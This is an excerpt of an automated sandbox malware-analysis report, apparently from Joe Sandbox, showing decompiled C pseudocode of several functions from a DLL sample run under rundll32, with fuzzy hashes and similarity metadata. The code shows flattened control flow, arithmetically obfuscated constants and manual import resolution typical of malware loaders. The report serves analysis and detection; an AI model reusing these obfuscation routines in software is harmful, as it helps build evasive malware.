                                                                        							_t148 = _t148 + 1;
                                                                        							__eflags =  *_t148 - _t144;
                                                                        						} while ( *_t148 != _t144);
                                                                        					}
                                                                        					_t147 = 0x264c2085;
                                                                        					L18:
                                                                        					__eflags = _t147 - 0xaeeb649;
                                                                        				} while (__eflags != 0);
                                                                        				goto L21;
                                                                        			}





























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D3$So
                                                                        • API String ID: 0-1798533957
                                                                        • Opcode ID: f8f88fcedb07124a3c2552d532e28816b7cee94d3e288d1335ce9db65d1f1dfa
                                                                        • Instruction ID: a36dc09e0a722225465dbaf5dc1fbc69e17eb54196c5202d43f44068f2dc291a
                                                                        • Opcode Fuzzy Hash: f8f88fcedb07124a3c2552d532e28816b7cee94d3e288d1335ce9db65d1f1dfa
                                                                        • Instruction Fuzzy Hash: 3D7164710093419FD355CE60C88990FBBE1FBC5788F40491DF1969A2A1D3B6DA8ACF87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E10011B71(intOrPtr* __ecx, void* __edx, signed int _a4, intOrPtr _a8) {
                                                                        				char _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				void* _t130;
                                                                        				signed int _t156;
                                                                        				signed int _t158;
                                                                        				signed int _t159;
                                                                        				signed int _t160;
                                                                        				void* _t163;
                                                                        				intOrPtr* _t180;
                                                                        				signed int* _t181;
                                                                        				signed int* _t184;
                                                                        
                                                                        				_t181 = _a4;
                                                                        				_push(_a8);
                                                                        				_t180 = __ecx;
                                                                        				_push(_t181);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t130);
                                                                        				_a4 = 0x4753;
                                                                        				_t184 =  &(( &_v100)[4]);
                                                                        				_a4 = _a4 >> 4;
                                                                        				_t163 = 0x1ce4a29c;
                                                                        				_t158 = 0x7b;
                                                                        				_a4 = _a4 / _t158;
                                                                        				_a4 = _a4 + 0xffff71bd;
                                                                        				_a4 = _a4 ^ 0xffff4206;
                                                                        				_v72 = 0xd68c;
                                                                        				_t159 = 5;
                                                                        				_v72 = _v72 * 0x66;
                                                                        				_v72 = _v72 ^ 0x00552ab5;
                                                                        				_v56 = 0xc5bd;
                                                                        				_v56 = _v56 * 0x1e;
                                                                        				_v56 = _v56 ^ 0x00172fa5;
                                                                        				_v96 = 0x2782;
                                                                        				_v96 = _v96 << 5;
                                                                        				_v96 = _v96 >> 2;
                                                                        				_v96 = _v96 / _t159;
                                                                        				_v96 = _v96 ^ 0x00004dd3;
                                                                        				_v60 = 0xbb2b;
                                                                        				_v60 = _v60 ^ 0x9bc1f403;
                                                                        				_v60 = _v60 ^ 0x9bc17fed;
                                                                        				_v64 = 0x890;
                                                                        				_t160 = 0x79;
                                                                        				_v64 = _v64 / _t160;
                                                                        				_v64 = _v64 ^ 0x00001224;
                                                                        				_v68 = 0xd52d;
                                                                        				_v68 = _v68 | 0x66ad6dc2;
                                                                        				_v68 = _v68 ^ 0x66addc3f;
                                                                        				_v80 = 0x2d15;
                                                                        				_v80 = _v80 ^ 0xe1b04c0e;
                                                                        				_v80 = _v80 | 0x8df21731;
                                                                        				_v80 = _v80 ^ 0xedf2018b;
                                                                        				_v84 = 0x4d41;
                                                                        				_v84 = _v84 + 0xffffece7;
                                                                        				_v84 = _v84 ^ 0xe6ee3790;
                                                                        				_v84 = _v84 * 0x66;
                                                                        				_v84 = _v84 ^ 0x02d92ffd;
                                                                        				_v76 = 0x5bdd;
                                                                        				_v76 = _v76 * 0x72;
                                                                        				_v76 = _v76 << 0xf;
                                                                        				_v76 = _v76 ^ 0x7435051d;
                                                                        				_v88 = 0x9998;
                                                                        				_v88 = _v88 * 0xf;
                                                                        				_v88 = _v88 << 3;
                                                                        				_v88 = _v88 + 0xffff20a8;
                                                                        				_v88 = _v88 ^ 0x004709cc;
                                                                        				_v92 = 0xdec6;
                                                                        				_v92 = _v92 >> 0xc;
                                                                        				_v92 = _v92 ^ 0x867abd03;
                                                                        				_v92 = _v92 * 0x46;
                                                                        				_v92 = _v92 ^ 0xc58fdc4c;
                                                                        				_v100 = 0x13e8;
                                                                        				_v100 = _v100 << 9;
                                                                        				_v100 = _v100 * 0x42;
                                                                        				_v100 = _v100 + 0xff79;
                                                                        				_v100 = _v100 ^ 0x0a449f79;
                                                                        				do {
                                                                        					while(_t163 != 0x2937ce5) {
                                                                        						if(_t163 == 0x183d422a) {
                                                                        							E10018582(_v84, _t180 + 4, __eflags, _v76,  &_v52, _v88, _v92);
                                                                        						} else {
                                                                        							if(_t163 == 0x1ce4a29c) {
                                                                        								_t163 = 0x35771045;
                                                                        								 *_t181 =  *_t181 & 0x00000000;
                                                                        								_t181[1] = _v100;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t163 == 0x1ed204aa) {
                                                                        									E1000CD04(_v64,  *_t180, _v68,  &_v52, _v80);
                                                                        									_t184 =  &(_t184[3]);
                                                                        									_t163 = 0x183d422a;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t163 == 0x3303492c) {
                                                                        										_push(_t163);
                                                                        										_t156 = E100157E8(_t181[1]);
                                                                        										 *_t181 = _t156;
                                                                        										__eflags = _t156;
                                                                        										if(__eflags != 0) {
                                                                        											_t163 = 0x2937ce5;
                                                                        											continue;
                                                                        										}
                                                                        									} else {
                                                                        										if(_t163 != 0x35771045) {
                                                                        											goto L13;
                                                                        										} else {
                                                                        											_t181[1] = E10004A2B(_t180);
                                                                        											_t163 = 0x3303492c;
                                                                        											continue;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L16:
                                                                        						__eflags =  *_t181;
                                                                        						_t129 =  *_t181 != 0;
                                                                        						__eflags = _t129;
                                                                        						return 0 | _t129;
                                                                        					}
                                                                        					E1001F3E9(_v56, _v96, _v60, _t181,  &_v52);
                                                                        					_t184 =  &(_t184[3]);
                                                                        					_t163 = 0x1ed204aa;
                                                                        					L13:
                                                                        					__eflags = _t163 - 0x1f54ddf;
                                                                        				} while (__eflags != 0);
                                                                        				goto L16;
                                                                        			}
                                                                        0x10011d78
                                                                        0x10011d70
                                                                        0x10011d68
                                                                        0x10011e36
                                                                        0x10011e38
                                                                        0x10011e3d
                                                                        0x10011e3d
                                                                        0x10011e44
                                                                        0x10011e44
                                                                        0x10011dfb
                                                                        0x10011e00
                                                                        0x10011e03
                                                                        0x10011e08
                                                                        0x10011e08
                                                                        0x10011e08
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AM$SG
                                                                        • API String ID: 0-2359636636
                                                                        • Opcode ID: 335b760aecf9311ccc4c76b46dd11e98044fb8b6b4e5fe0ea9c494827d2a9ad0
                                                                        • Instruction ID: 73a1d719dcb80061ca56764ad851f481a03b11d3d12b559eb37b6c303cc90ad2
                                                                        • Opcode Fuzzy Hash: 335b760aecf9311ccc4c76b46dd11e98044fb8b6b4e5fe0ea9c494827d2a9ad0
                                                                        • Instruction Fuzzy Hash: 807147B15083429FD368CF21D48645FBBE1FBC4348F504A1EF5968A260D375DA89CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E1001C6AD(intOrPtr* __ecx) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				char _v328;
                                                                        				char _t161;
                                                                        				signed int _t164;
                                                                        				void* _t167;
                                                                        				signed int _t169;
                                                                        				signed int _t170;
                                                                        				signed int _t171;
                                                                        				signed int _t172;
                                                                        				signed int _t173;
                                                                        				char* _t174;
                                                                        				intOrPtr* _t193;
                                                                        				void* _t194;
                                                                        				void* _t195;
                                                                        				void* _t196;
                                                                        
                                                                        				_v40 = 0xfa39;
                                                                        				_v40 = _v40 + 0xdb01;
                                                                        				_v40 = _v40 + 0xffffe592;
                                                                        				_v40 = _v40 ^ 0x0001c62b;
                                                                        				_v68 = 0xbea4;
                                                                        				_v68 = _v68 >> 0xd;
                                                                        				_v68 = _v68 ^ 0x00007ac8;
                                                                        				_v36 = 0x4356;
                                                                        				_v36 = _v36 >> 0x10;
                                                                        				_v36 = _v36 >> 4;
                                                                        				_v36 = _v36 ^ 0x00002e98;
                                                                        				_v12 = 0xe2d2;
                                                                        				_v12 = _v12 >> 6;
                                                                        				_v12 = _v12 + 0xffff2c83;
                                                                        				_t193 = __ecx;
                                                                        				_v12 = _v12 * 0x62;
                                                                        				_v12 = _v12 ^ 0xffb02725;
                                                                        				_v16 = 0xb4cd;
                                                                        				_v16 = _v16 >> 9;
                                                                        				_v16 = _v16 | 0xafffddff;
                                                                        				_v16 = _v16 ^ 0xafffea00;
                                                                        				_v8 = 0x68cb;
                                                                        				_v8 = _v8 | 0xb32e4b28;
                                                                        				_v8 = _v8 << 0xf;
                                                                        				_v8 = _v8 ^ 0x0d8dd4c4;
                                                                        				_v8 = _v8 ^ 0x38786c55;
                                                                        				_v48 = 0xfb83;
                                                                        				_v48 = _v48 | 0x7a1a2a9c;
                                                                        				_v48 = _v48 ^ 0x7a1ab4a3;
                                                                        				_v20 = 0x79fd;
                                                                        				_t169 = 3;
                                                                        				_v20 = _v20 / _t169;
                                                                        				_v20 = _v20 + 0x1426;
                                                                        				_t170 = 0x65;
                                                                        				_v20 = _v20 / _t170;
                                                                        				_v20 = _v20 ^ 0x00003bd3;
                                                                        				_v28 = 0xa065;
                                                                        				_t171 = 0x78;
                                                                        				_v28 = _v28 / _t171;
                                                                        				_v28 = _v28 | 0x67e4385d;
                                                                        				_v28 = _v28 ^ 0x67e41ce2;
                                                                        				_v52 = 0xcb25;
                                                                        				_v52 = _v52 | 0x001bc1db;
                                                                        				_v52 = _v52 ^ 0x001ba08f;
                                                                        				_v60 = 0xfe76;
                                                                        				_v60 = _v60 + 0xffff45c9;
                                                                        				_v60 = _v60 ^ 0x00003b0c;
                                                                        				_v32 = 0xb195;
                                                                        				_v32 = _v32 + 0xffff6114;
                                                                        				_v32 = _v32 << 6;
                                                                        				_v32 = _v32 ^ 0x0004e941;
                                                                        				_v24 = 0xa461;
                                                                        				_v24 = _v24 >> 0xd;
                                                                        				_t172 = 0x2a;
                                                                        				_v24 = _v24 / _t172;
                                                                        				_v24 = _v24 * 0x41;
                                                                        				_v24 = _v24 ^ 0x00004365;
                                                                        				_v64 = 0x6361;
                                                                        				_t173 = 0x6a;
                                                                        				_t174 =  &_v328;
                                                                        				_v64 = _v64 / _t173;
                                                                        				_v64 = _v64 ^ 0x00000cc9;
                                                                        				_v56 = 0x48bf;
                                                                        				_v56 = _v56 ^ 0x5ae3b612;
                                                                        				_v56 = _v56 ^ 0x5ae38705;
                                                                        				_v44 = 0xaf17;
                                                                        				_v44 = _v44 | 0xd3b2bd8d;
                                                                        				_v44 = _v44 << 5;
                                                                        				_v44 = _v44 ^ 0x7657b8ea;
                                                                        				while(1) {
                                                                        					_t161 =  *_t193;
                                                                        					if(_t161 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t161 == 0x2e) {
                                                                        						 *_t174 = 0;
                                                                        					} else {
                                                                        						 *_t174 = _t161;
                                                                        						_t174 = _t174 + 1;
                                                                        						_t193 = _t193 + 1;
                                                                        						continue;
                                                                        					}
                                                                        					L6:
                                                                        					_t194 = E10015719(_v40, _v68, _v36,  &_v328, _v12);
                                                                        					_t196 = _t195 + 0xc;
                                                                        					if(_t194 != 0) {
                                                                        						L8:
                                                                        						_t164 = E10010EAE(_t193 + 1, _v28, _v52, _v60, _v32);
                                                                        						_push(_v44);
                                                                        						_push(_v56);
                                                                        						_push(_t194);
                                                                        						_push(_v64);
                                                                        						return E10002419(_v24, _t164 ^ 0x165fe069);
                                                                        					}
                                                                        					_t167 = E10018DF5( &_v328, _v16, _v8, _v48, _v20);
                                                                        					_t194 = _t167;
                                                                        					_t196 = _t196 + 0xc;
                                                                        					if(_t194 != 0) {
                                                                        						goto L8;
                                                                        					}
                                                                        					return _t167;
                                                                        				}
                                                                        				goto L6;
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Ulx8$]8g
                                                                        • API String ID: 0-1828074717
                                                                        • Opcode ID: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
                                                                        • Instruction ID: 5bc45f7731ee84d747845716ac0e0d381f413dec0c038b2a0d0c64420890e08a
                                                                        • Opcode Fuzzy Hash: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
                                                                        • Instruction Fuzzy Hash: 95615571D0121DEBEF08CFA0D84A5EEBBB2FF04314F208158D411BA2A4D7B95A59CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E1001CAA0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				void* _t121;
                                                                        				void* _t139;
                                                                        				void* _t143;
                                                                        				void* _t145;
                                                                        				void* _t166;
                                                                        				signed int _t167;
                                                                        				signed int _t168;
                                                                        				signed int _t169;
                                                                        				signed int _t170;
                                                                        				signed int _t171;
                                                                        				signed int* _t174;
                                                                        
                                                                        				_push(_a16);
                                                                        				_t165 = _a4;
                                                                        				_t143 = __ecx;
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t121);
                                                                        				_v88 = 0xa345;
                                                                        				_t174 =  &(( &_v96)[6]);
                                                                        				_t166 = 0;
                                                                        				_t145 = 0x388706b5;
                                                                        				_t167 = 0x17;
                                                                        				_v88 = _v88 / _t167;
                                                                        				_v88 = _v88 << 2;
                                                                        				_v88 = _v88 ^ 0xb586a132;
                                                                        				_v88 = _v88 ^ 0xb586a8c9;
                                                                        				_v68 = 0x3c18;
                                                                        				_t168 = 0x75;
                                                                        				_v68 = _v68 / _t168;
                                                                        				_v68 = _v68 | 0xfaaa2e7e;
                                                                        				_v68 = _v68 ^ 0xfaaa5d3e;
                                                                        				_v72 = 0x292c;
                                                                        				_t169 = 0x30;
                                                                        				_v72 = _v72 / _t169;
                                                                        				_t170 = 0x7d;
                                                                        				_v72 = _v72 / _t170;
                                                                        				_v72 = _v72 ^ 0x00000df9;
                                                                        				_v64 = 0xacd5;
                                                                        				_v64 = _v64 + 0x8377;
                                                                        				_v64 = _v64 ^ 0x00014058;
                                                                        				_v92 = 0x91f4;
                                                                        				_v92 = _v92 ^ 0x59127442;
                                                                        				_v92 = _v92 ^ 0xd1a3ee64;
                                                                        				_v92 = _v92 ^ 0x1200e02f;
                                                                        				_v92 = _v92 ^ 0x9ab1bc65;
                                                                        				_v76 = 0x8653;
                                                                        				_v76 = _v76 | 0x93bc935f;
                                                                        				_v76 = _v76 << 4;
                                                                        				_v76 = _v76 ^ 0x3bc90d53;
                                                                        				_v96 = 0x9841;
                                                                        				_t171 = 0x42;
                                                                        				_v96 = _v96 / _t171;
                                                                        				_v96 = _v96 * 0x19;
                                                                        				_v96 = _v96 * 0x44;
                                                                        				_v96 = _v96 ^ 0x000f441a;
                                                                        				_v56 = 0xfe3f;
                                                                        				_v56 = _v56 + 0xc16;
                                                                        				_v56 = _v56 ^ 0x000102f3;
                                                                        				_v60 = 0xb3bd;
                                                                        				_v60 = _v60 + 0xffff84e2;
                                                                        				_v60 = _v60 ^ 0x0000629b;
                                                                        				_v80 = 0x779;
                                                                        				_v80 = _v80 << 0xa;
                                                                        				_v80 = _v80 << 2;
                                                                        				_v80 = _v80 | 0x746c3a89;
                                                                        				_v80 = _v80 ^ 0x747fb8a8;
                                                                        				_v84 = 0x97f4;
                                                                        				_v84 = _v84 ^ 0xacb5c4e6;
                                                                        				_v84 = _v84 * 0x15;
                                                                        				_v84 = _v84 | 0x645395ef;
                                                                        				_v84 = _v84 ^ 0x6edfb60f;
                                                                        				do {
                                                                        					while(_t145 != 0x10d238e9) {
                                                                        						if(_t145 == 0x13bcd39c) {
                                                                        							_t139 = E1001D290(_v64, _v92, _v76, _t165, _v96,  &_v52);
                                                                        							_t174 =  &(_t174[4]);
                                                                        							__eflags = _t139;
                                                                        							if(__eflags != 0) {
                                                                        								_t145 = 0x30fa29dc;
                                                                        								continue;
                                                                        							}
                                                                        						} else {
                                                                        							if(_t145 == 0x30fa29dc) {
                                                                        								__eflags = E10009899(_t165 + 4, _v56, __eflags,  &_v52, _v60, _v80, _v84);
                                                                        								_t166 =  !=  ? 1 : _t166;
                                                                        							} else {
                                                                        								if(_t145 != 0x388706b5) {
                                                                        									goto L9;
                                                                        								} else {
                                                                        									_t145 = 0x10d238e9;
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L12:
                                                                        						return _t166;
                                                                        					}
                                                                        					E1001F3E9(_v88, _v68, _v72, _t143,  &_v52);
                                                                        					_t174 =  &(_t174[3]);
                                                                        					_t145 = 0x13bcd39c;
                                                                        					L9:
                                                                        					__eflags = _t145 - 0x2a61d71f;
                                                                        				} while (__eflags != 0);
                                                                        				goto L12;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,)$/
                                                                        • API String ID: 0-233899039
                                                                        • Opcode ID: 4ad18bab273ac8b3cf774fb827cc12b4d9418481b084281fa1ae0e97bf415739
                                                                        • Instruction ID: 65b2c97f17a7b7744a18fbb07baf764625514e653d75bdddd1878b23c210d4d9
                                                                        • Opcode Fuzzy Hash: 4ad18bab273ac8b3cf774fb827cc12b4d9418481b084281fa1ae0e97bf415739
                                                                        • Instruction Fuzzy Hash: 82516571508345AFE354CF21C489A1BBBE1FBC8788F40891DF4A69A2A0D775DA49CF87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E100056B3(void* __edx, char _a4, signed short _a8, intOrPtr _a12) {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				void* __ecx;
                                                                        				void* _t84;
                                                                        				void* _t91;
                                                                        				signed short _t97;
                                                                        				signed short _t98;
                                                                        				signed short _t99;
                                                                        				signed int _t101;
                                                                        				signed int _t102;
                                                                        				intOrPtr _t111;
                                                                        				signed short _t113;
                                                                        				signed short* _t116;
                                                                        				signed short _t117;
                                                                        				signed short _t119;
                                                                        				signed int* _t121;
                                                                        
                                                                        				_t99 = _a8;
                                                                        				_push(_a12);
                                                                        				_push(_t99);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				E100056B2(_t84);
                                                                        				_a8 = 0xbb3c;
                                                                        				_t121 =  &(( &_v24)[5]);
                                                                        				_a8 = _a8 + 0xffff0478;
                                                                        				_a8 = _a8 << 0xb;
                                                                        				_a8 = _a8 + 0xfffffb27;
                                                                        				_a8 = _a8 ^ 0xfdfd9b26;
                                                                        				_v16 = 0x694e;
                                                                        				_v16 = _v16 >> 5;
                                                                        				_v16 = _v16 + 0xffffd888;
                                                                        				_v16 = _v16 << 0xe;
                                                                        				_v16 = _v16 ^ 0xf6f4b2b2;
                                                                        				_v4 = 0xcfd5;
                                                                        				_t101 = 0x77;
                                                                        				_v4 = _v4 / _t101;
                                                                        				_v4 = _v4 ^ 0x00007af6;
                                                                        				_v20 = 0x3853;
                                                                        				_v20 = _v20 + 0x2f57;
                                                                        				_v20 = _v20 << 0xc;
                                                                        				_v20 = _v20 << 3;
                                                                        				_v20 = _v20 ^ 0x33d5042f;
                                                                        				_v24 = 0x48cf;
                                                                        				_v24 = _v24 >> 4;
                                                                        				_v24 = _v24 + 0xa5d7;
                                                                        				_v24 = _v24 ^ 0x227c1387;
                                                                        				_v24 = _v24 ^ 0x227cf043;
                                                                        				_v8 = 0x820c;
                                                                        				_v8 = _v8 * 0x4e;
                                                                        				_v8 = _v8 * 0x1d;
                                                                        				_v8 = _v8 ^ 0x047d7705;
                                                                        				_v12 = 0x55c9;
                                                                        				_v12 = _v12 + 0xffff6fb2;
                                                                        				_v12 = _v12 << 9;
                                                                        				_v12 = _v12 ^ 0xff8ad068;
                                                                        				_t102 = _a8;
                                                                        				_t91 =  *((intOrPtr*)(_t99 + 0x3c)) + _t99;
                                                                        				_t111 =  *((intOrPtr*)(_t91 + 0x78 + _t102 * 8));
                                                                        				if(_t111 == 0 ||  *((intOrPtr*)(_t91 + 0x7c + _t102 * 8)) == 0) {
                                                                        					L13:
                                                                        					return 1;
                                                                        				} else {
                                                                        					_t117 = _t111 + _t99;
                                                                        					while(1) {
                                                                        						_t94 =  *((intOrPtr*)(_t117 + 0xc));
                                                                        						if( *((intOrPtr*)(_t117 + 0xc)) == 0) {
                                                                        							goto L13;
                                                                        						}
                                                                        						_t113 = E10018DF5(_t94 + _t99, _v16, _v4, _v20, _v24);
                                                                        						_t121 =  &(_t121[3]);
                                                                        						_a8 = _t113;
                                                                        						__eflags = _t113;
                                                                        						if(_t113 == 0) {
                                                                        							L15:
                                                                        							return 0;
                                                                        						}
                                                                        						_t116 =  *_t117 + _t99;
                                                                        						_t119 =  *((intOrPtr*)(_t117 + 0x10)) + _t99;
                                                                        						while(1) {
                                                                        							_t97 =  *_t116;
                                                                        							__eflags = _t97;
                                                                        							if(__eflags == 0) {
                                                                        								break;
                                                                        							}
                                                                        							if(__eflags >= 0) {
                                                                        								_t105 = _t99 + 2 + _t97;
                                                                        								__eflags = _t99 + 2 + _t97;
                                                                        							} else {
                                                                        								_t105 = _t97 & 0x0000ffff;
                                                                        							}
                                                                        							_t98 = E1000CDD0(_t105, _v8, _v12, _t113);
                                                                        							__eflags = _t98;
                                                                        							if(_t98 == 0) {
                                                                        								goto L15;
                                                                        							} else {
                                                                        								_t113 = _a8;
                                                                        								_t116 =  &(_t116[2]);
                                                                        								 *_t119 = _t98;
                                                                        								_t119 =  &_a4;
                                                                        								__eflags = _t119;
                                                                        								continue;
                                                                        							}
                                                                        						}
                                                                        						_t117 = _t117 + 0x14;
                                                                        						__eflags = _t117;
                                                                        					}
                                                                        					goto L13;
                                                                        				}
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Ni$W/
                                                                        • API String ID: 0-111194442
                                                                        • Opcode ID: ce07b1ab16d3e2f26c795e08b7096ef518bbb2213e0d655af138487974276c43
                                                                        • Instruction ID: 9a1005561c3df8b761318bfd7a223ab57cf0a9f60e4c9267babe61ed4d5f545d
                                                                        • Opcode Fuzzy Hash: ce07b1ab16d3e2f26c795e08b7096ef518bbb2213e0d655af138487974276c43
                                                                        • Instruction Fuzzy Hash: 544168B15083428FE354CF24C88480BBBF1FBC4798F518A2CF99596255EB76DA09CF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1001DD78(void* __ecx) {
                                                                        				intOrPtr _v4;
                                                                        				intOrPtr _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				unsigned int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				void* _t69;
                                                                        				void* _t73;
                                                                        				void* _t76;
                                                                        				intOrPtr _t79;
                                                                        				signed int* _t81;
                                                                        
                                                                        				_t73 = __ecx;
                                                                        				_t81 =  &_v40;
                                                                        				_v8 = 0x1b7700;
                                                                        				_t79 = 0;
                                                                        				_v4 = 0;
                                                                        				_t76 = 0xdac552c;
                                                                        				_v16 = 0x3c26;
                                                                        				_v16 = _v16 | 0x2b145b71;
                                                                        				_v16 = _v16 ^ 0x2b14102b;
                                                                        				_v40 = 0xd45e;
                                                                        				_v40 = _v40 ^ 0x28d15431;
                                                                        				_v40 = _v40 * 0xf;
                                                                        				_v40 = _v40 | 0xf1f7d666;
                                                                        				_v40 = _v40 ^ 0xf5f7dcd7;
                                                                        				_v20 = 0xc134;
                                                                        				_v20 = _v20 ^ 0xfce9bf97;
                                                                        				_v20 = _v20 ^ 0xfce94421;
                                                                        				_v24 = 0x60c0;
                                                                        				_v24 = _v24 >> 0xe;
                                                                        				_v24 = _v24 ^ 0x00000a32;
                                                                        				_v12 = 0x6ec6;
                                                                        				_v12 = _v12 << 5;
                                                                        				_v12 = _v12 ^ 0x000ddcb5;
                                                                        				_v28 = 0xb783;
                                                                        				_v28 = _v28 + 0x4382;
                                                                        				_v28 = _v28 + 0xd9fc;
                                                                        				_v28 = _v28 ^ 0x0001ab03;
                                                                        				_v36 = 0xe117;
                                                                        				_v36 = _v36 >> 0xc;
                                                                        				_v36 = _v36 | 0x4f01522f;
                                                                        				_v36 = _v36 + 0xffffd003;
                                                                        				_v36 = _v36 ^ 0x4f014085;
                                                                        				_v32 = 0xf8b3;
                                                                        				_v32 = _v32 * 0x65;
                                                                        				_v32 = _v32 + 0xc87a;
                                                                        				_v32 = _v32 ^ 0x0062f8e1;
                                                                        				do {
                                                                        					while(_t76 != 0x15fecb3) {
                                                                        						if(_t76 == 0xdac552c) {
                                                                        							_t76 = 0x15fecb3;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t76 != 0x172cce4b) {
                                                                        								goto L8;
                                                                        							} else {
                                                                        								_t79 = _t79 + E10007544(_v12, _v28, _v36, _t73 + 4, _v32);
                                                                        							}
                                                                        						}
                                                                        						L5:
                                                                        						return _t79;
                                                                        					}
                                                                        					_t69 = E10007E30();
                                                                        					_t81 = _t81 - 0xc + 0xc;
                                                                        					_t76 = 0x172cce4b;
                                                                        					_t79 = _t79 + _t69;
                                                                        					L8:
                                                                        				} while (_t76 != 0x1c39a7d);
                                                                        				goto L5;
                                                                        			}



















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &<$2
                                                                        • API String ID: 0-12532211
                                                                        • Opcode ID: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
